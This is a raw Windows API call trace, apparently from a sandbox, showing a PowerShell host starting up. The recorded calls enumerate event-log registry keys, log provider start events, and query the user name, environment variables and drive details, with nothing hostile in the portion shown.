	[0145.822] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x3, lpName=0x2867a0, lpcchName=0x1cd198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.822] CoTaskMemFree (pv=0x2867a0) 
	[0145.822] CoTaskMemFree (pv=0x0) 
	[0145.822] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.822] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x4, lpName=0x2867a0, lpcchName=0x1cd198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.822] CoTaskMemFree (pv=0x2867a0) 
	[0145.822] CoTaskMemFree (pv=0x0) 
	[0145.822] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.823] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x5, lpName=0x2867a0, lpcchName=0x1cd198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.823] CoTaskMemFree (pv=0x2867a0) 
	[0145.823] CoTaskMemFree (pv=0x0) 
	[0145.823] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.823] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x6, lpName=0x2867a0, lpcchName=0x1cd198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.823] CoTaskMemFree (pv=0x2867a0) 
	[0145.823] CoTaskMemFree (pv=0x0) 
	[0145.823] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.823] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x7, lpName=0x2867a0, lpcchName=0x1cd198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.823] CoTaskMemFree (pv=0x2867a0) 
	[0145.823] CoTaskMemFree (pv=0x0) 
	[0145.823] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.823] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x8, lpName=0x2867a0, lpcchName=0x1cd198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.823] CoTaskMemFree (pv=0x2867a0) 
	[0145.823] CoTaskMemFree (pv=0x0) 
	[0145.823] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x38c) returned 0x0
	[0145.824] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x0) returned 0x2
	[0145.824] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x3b0) returned 0x0
	[0145.824] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x0) returned 0x2
	[0145.824] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x3b4) returned 0x0
	[0145.824] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x0) returned 0x2
	[0145.824] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x3b8) returned 0x0
	[0145.824] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x0) returned 0x2
	[0145.824] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x3bc) returned 0x0
	[0145.825] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x0) returned 0x2
	[0145.825] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x3c0) returned 0x0
	[0145.825] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x0) returned 0x2
	[0145.825] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x3c4) returned 0x0
	[0145.825] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x0) returned 0x2
	[0145.825] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x3c8) returned 0x0
	[0145.825] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x0) returned 0x2
	[0145.825] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x3cc) returned 0x0
	[0145.826] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1f8 | out: phkResult=0x1cd1f8*=0x3d0) returned 0x0
	[0145.826] RegCloseKey (hKey=0x3d0) returned 0x0
	[0145.826] RegCloseKey (hKey=0x3ac) returned 0x0
	[0145.826] RegCloseKey (hKey=0x3cc) returned 0x0
	[0145.945] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b900008
	[0146.081] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c7c100*="WSMan", lpRawData=0x3c7be70) returned 1
	[0146.083] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0146.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.083] CoTaskMemFree (pv=0x23ecf0) 
	[0146.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.086] CoTaskMemAlloc (cb=0x804) returned 0x1b83a820
	[0146.086] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83a820, nSize=0x1cd488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd488) returned 0x1
	[0146.087] CoTaskMemFree (pv=0x1b83a820) 
	[0146.087] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0146.087] GetUserNameW (in: lpBuffer=0x2867a0, pcbBuffer=0x1cd4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd4c8) returned 1
	[0146.087] CoTaskMemFree (pv=0x2867a0) 
	[0146.088] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c81638*="Alias", lpRawData=0x3c813c8) returned 1
	[0146.089] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0146.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.090] CoTaskMemFree (pv=0x23ecf0) 
	[0146.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.093] CoTaskMemAlloc (cb=0x804) returned 0x1b83a820
	[0146.093] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83a820, nSize=0x1cd488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd488) returned 0x1
	[0146.093] CoTaskMemFree (pv=0x1b83a820) 
	[0146.093] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0146.093] GetUserNameW (in: lpBuffer=0x2867a0, pcbBuffer=0x1cd4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd4c8) returned 1
	[0146.094] CoTaskMemFree (pv=0x2867a0) 
	[0146.094] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c86c30*="Environment", lpRawData=0x3c869c0) returned 1
	[0146.096] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0146.096] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.096] CoTaskMemFree (pv=0x23ecf0) 
	[0146.098] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0146.098] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0146.098] CoTaskMemFree (pv=0x23ecf0) 
	[0146.098] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0146.098] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0146.098] CoTaskMemFree (pv=0x23ecf0) 
	[0146.098] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0146.129] SetErrorMode (uMode=0x1) returned 0x1
	[0146.129] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1cd240 | out: lpFileInformation=0x1cd240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0146.130] SetErrorMode (uMode=0x1) returned 0x1
	[0146.131] GetLogicalDrives () returned 0x4
	[0146.131] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0146.132] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0146.133] SetErrorMode (uMode=0x1) returned 0x1
	[0146.133] CoTaskMemAlloc (cb=0x68) returned 0x1b835a20
	[0146.134] CoTaskMemAlloc (cb=0x68) returned 0x1b835a90
	[0146.134] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b835a20, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1cd210, lpMaximumComponentLength=0x1cd20c, lpFileSystemFlags=0x1cd208, lpFileSystemNameBuffer=0x1b835a90, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cd210*=0x9c354b42, lpMaximumComponentLength=0x1cd20c*=0xff, lpFileSystemFlags=0x1cd208*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0146.134] CoTaskMemFree (pv=0x1b835a20) 
	[0146.134] CoTaskMemFree (pv=0x1b835a90) 
	[0146.134] SetErrorMode (uMode=0x1) returned 0x1
	[0146.134] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0146.135] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0146.135] SetErrorMode (uMode=0x1) returned 0x1
	[0146.135] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd1b0 | out: lpFileInformation=0x1cd1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0146.135] SetErrorMode (uMode=0x1) returned 0x1
	[0146.136] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0146.136] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0146.136] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0146.136] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccd30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0146.136] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0146.137] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0146.137] SetErrorMode (uMode=0x1) returned 0x1
	[0146.137] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ccfe0 | out: lpFileInformation=0x1ccfe0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0146.137] SetErrorMode (uMode=0x1) returned 0x1
	[0146.137] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0146.138] SetErrorMode (uMode=0x1) returned 0x1
	[0146.138] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ccfe0 | out: lpFileInformation=0x1ccfe0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0146.138] SetErrorMode (uMode=0x1) returned 0x1
	[0146.138] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0146.138] SetErrorMode (uMode=0x1) returned 0x1
	[0146.138] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd080 | out: lpFileInformation=0x1cd080*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0146.138] SetErrorMode (uMode=0x1) returned 0x1
	[0146.139] CoTaskMemAlloc (cb=0x804) returned 0x1b83a820
	[0146.139] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83a820, nSize=0x1cd488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd488) returned 0x1
	[0146.139] CoTaskMemFree (pv=0x1b83a820) 
	[0146.139] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0146.139] GetUserNameW (in: lpBuffer=0x2867a0, pcbBuffer=0x1cd4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd4c8) returned 1
	[0146.139] CoTaskMemFree (pv=0x2867a0) 
	[0146.140] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d872b0*="FileSystem", lpRawData=0x2d87040) returned 1
	[0146.141] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0146.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.142] CoTaskMemFree (pv=0x23ecf0) 
	[0146.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.143] CoTaskMemAlloc (cb=0x804) returned 0x1b83a820
	[0146.143] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83a820, nSize=0x1cd488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd488) returned 0x1
	[0146.144] CoTaskMemFree (pv=0x1b83a820) 
	[0146.144] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0146.144] GetUserNameW (in: lpBuffer=0x2867a0, pcbBuffer=0x1cd4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd4c8) returned 1
	[0146.144] CoTaskMemFree (pv=0x2867a0) 
	[0146.144] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d8caf0*="Function", lpRawData=0x2d8c880) returned 1
	[0146.148] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0146.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.148] CoTaskMemFree (pv=0x23ecf0) 
	[0146.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.400] CoTaskMemAlloc (cb=0x804) returned 0x1b83a820
	[0146.400] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83a820, nSize=0x1cd488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd488) returned 0x1
	[0146.401] CoTaskMemFree (pv=0x1b83a820) 
	[0146.401] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0146.401] GetUserNameW (in: lpBuffer=0x2867a0, pcbBuffer=0x1cd4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd4c8) returned 1
	[0146.401] CoTaskMemFree (pv=0x2867a0) 
	[0146.402] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dbeec8*="Registry", lpRawData=0x2dbec58) returned 1
	[0146.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.614] CoTaskMemAlloc (cb=0x804) returned 0x1b83a820
	[0146.614] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83a820, nSize=0x1cd488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd488) returned 0x1
	[0146.615] CoTaskMemFree (pv=0x1b83a820) 
